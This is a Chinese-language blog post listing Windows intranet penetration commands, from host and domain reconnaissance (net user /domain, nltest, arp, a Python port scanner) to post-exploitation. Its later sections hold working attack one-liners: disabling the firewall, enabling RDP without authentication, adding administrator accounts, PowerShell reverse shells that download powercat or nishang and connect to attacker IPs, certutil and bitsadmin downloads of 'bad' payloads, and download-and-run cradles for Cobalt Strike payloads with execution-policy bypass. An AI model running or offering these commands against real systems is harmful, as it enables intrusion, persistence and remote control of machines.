Windows內網滲透信息搜集命令總匯
一、正文
前幾天面試的時候被師傅問到了這個問題,當時不是很會,現在來學學
二、本機信息收集
1、查詢網絡配置信息
ipconfig /all
2、查詢本機的服務信息
wmic service list brief

3、查詢系統信息
systeminfo

4、查詢進程列表
tasklist / wmic process list brief

5、查看計劃任務
schtasks /query /fo LIST /v 列出計劃任務詳細信息
6、查看主機開機時間
net statistics workstation

7、用戶相關
net user 查看所有用戶
net localgroup administrators 獲取本地管理員信息
8、查看端口列表
netstat -ano
9、查看已打補丁
wmic qfe get Caption,Description,HotFixID,InstalledOn
10、查看共享列表
net share 查看本機共享列表和可訪問的域共享列表
wmic share get name,path,status 查找共享列表
11、路由表和arp高速緩存表
route print 路由表
arp -a arp高速緩存表
12、防火墻
netsh firewall set opmode disable 關閉防火墻(Windows Server 2003 以前的版本)
netsh advfirewall set allprofiles state off 關閉防火墻(Windows Server 2003 以后的版本)
netsh firewall show config 查看防火墻配置
如果上面的命令被棄用,則使用
netsh advfirewall firewall show rule name=all
根據參考,可以使用這個wmic一鍵獲取本機信息http://www.fuzzysecurity.com/scripts/files/wmic_info.rar
三、域信息收集
1、權限查看
whoami /all 查看自己的詳細權限
net user xxx /domain 查看域內指定用戶的權限
2、判斷是否存在域
.net time /domain 若出現以下情況則不存在域

若是報錯:發生系統錯誤5,則存在域,但該用戶不是域用戶
若是以下情況則說明存在域且已經在域中

3、查看域的名字
net config workstation

nslookup -type=srv _ldap._tcp

這個很爽,域控主機名和IP一塊弄出來了
4、探測域內存活主機
(1).使用工具 nbtscan http://www.unixwiz.net/tools/nbtscan.html
(2).查看arp高速緩存表
arp -a

(3).ICMP協議探測(逐個ping)
這個賊慢,但是不用下載其他應用
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL"
(4).nmap直接開掃
(5).meterpreter會話中執行 run windows/gather/enum_ad_computers
5、掃描域內開放端口
(1).nmap
nmap 192.168.1.0/24
(2).工具 S掃描器
(3).自寫腳本
#python3 慢的一批
import socket
def get_ip_status(ip,port):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.connect((ip,port))
print('{0} port {1} is open'.format(ip, port))
except Exception as err:
print('{0} port {1} is not open'.format(ip,port))
finally:
server.close()
if __name__ == '__main__':
host = '172.16.0.198'
for port in range(20,100):
get_ip_status(host,port)
6、域內基本信息
net group “domain computers” /domain 查詢所有域成員計算機列表
net view /domain:HACHE 查詢域內所有主機
net accounts /domain 獲取域密碼信息
nltest /domain_trusts 獲取域信任信息
nltest /DCLIST:hacke 查看域控制器機器名
Nslookup -type=SRV_ldap._tcp 查看域控制器的主機名
7、域用戶信息收集
net user /domain 向域控制器查詢域內用戶列表
wmic useraccount get /all 獲取域內用戶詳細信息
net localgroup administrators 查詢本地管理員用戶
net group “domain admins” /domain 查詢域管理員用戶
net group “Enterprise admins” /domain 查詢管理員用戶組
8、本機wmic查殺軟
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
or
WMIC /namespace:\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe
9、開3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
10、用戶增刪改查
net user username password /add 加用戶
net localgroup administrators username /add 添加XX到管理員賬戶
11、一些喜歡用的
Windows 反彈shell
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.1.4 -p 9999 -e cmd
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.203.140 -port 6666
wmic 查殺軟
WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
開3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 0
常見殺軟進程名
https://blog.csdn.net/weixin_39997829/article/details/92666552
cmd下載
bitsadmin /transfer n http://www.xx.com/code.jpg c:\users\sdyp\desktop\ff.jpg C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt C:\Temp>certutil.exe -decode bad.txt bad.exe
獲取盤符
wmic logicaldisk where drivetype=3 get deviceid
12、ps cs 上線
powershell.exe -c IEX((new-object net.webclient).downloadstring('http://xxx/a.ps1'))
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
powershell -exec bypass -f \\webdavserver\folder\payload.ps1 (smb)
版權申明:內容來源網絡,版權歸原創者所有。除非無法確認,都會標明作者及出處,如有侵權煩請告知,我們會立即刪除并致歉。謝謝!